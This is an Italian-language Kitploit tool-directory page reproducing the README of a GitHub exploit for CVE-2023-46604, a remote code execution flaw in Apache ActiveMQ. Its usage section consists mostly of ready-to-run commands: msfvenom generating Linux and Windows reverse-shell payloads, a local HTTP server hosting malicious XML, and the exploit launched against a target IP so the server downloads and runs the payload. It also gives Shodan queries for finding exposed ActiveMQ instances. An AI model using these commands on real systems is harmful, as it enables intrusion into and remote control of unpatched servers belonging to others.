Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — Realizzare un exploit di reverse shell per Apache ActiveMQ (CVE_2023-46604) | Kitploit
Strumenti/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Realizzare un exploit di reverse shell per Apache ActiveMQ (CVE_2023-46604)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
12640532 anni faRevisionato da Kitploit
Condividi

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Questo exploit si basa sul lavoro fondamentale disponibile su https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). Abbiamo ulteriormente sviluppato la tecnica per ottenere una reverse shell utilizzando il Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Utilizzo:

Importante: Cambiare manualmente l'indirizzo IP (0.0.0.0 sulla riga 11) nei file XML con l'indirizzo IP in cui verrà generato il payload. Se segui i comandi seguenti, sarà il tuo indirizzo IP di ascolto. Inoltre {IP_Of_Hosted_XML_File} sarà il tuo indirizzo IP di ascolto.

Per target Linux/Unix

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Per target Windows

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f exe -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork:

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

Lavoro originale:

  • https://github.com/X1r0z/ActiveMQ-RCE

Per ulteriori letture:

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

Un ringraziamento speciale a https://github.com/Anon4mous per il supporto attivo.

Scarica lo strumento